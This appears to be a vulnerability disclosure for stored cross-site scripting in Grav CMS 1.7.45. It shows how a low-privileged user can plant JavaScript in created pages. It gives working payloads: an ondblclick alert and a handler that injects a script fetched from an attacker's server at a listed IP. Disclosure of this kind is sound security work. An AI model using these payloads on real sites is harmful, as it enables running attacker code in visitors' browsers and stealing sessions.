This vulnerability allows users with restricted page creation privileges to insert harmful JavaScript code into the pages they create, potentially compromising the system. To mitigate this risk, robust input validation and content filtering measures must be implemented to prevent the execution of unauthorized scripts and ensure system security.
The following image shows the this user dont have the privilege to add the java script according to the admin
The following image shows the version number.
step 1: Login into the user account.
Step 2: Create the page with <a ondblclick='alert(1)'><h1>test</h1></a> as shown in the picture.
Step 3: Navigate to the created page and double click on the link and note the XSS popup.
Step 4: Loading and XSS payload from the third party. with the following payload.
<a ondblclick='var s=document.createElement("script");s.src="http://192.168.86.129:9000/test.js";s.onerror=()=>console.error("Error loading script!");document.head.appendChild(s);'><h1>test</h1></a>
Step 5: The following image shows after loaded and executed code.
Step 6: The following image shows the code loaded and executed from the attackers server.
* PHP 8.2.12 (cli) (built: Jan 8 2024 06:21:20) (NTS)
* Grav v1.7.45
* kalilinux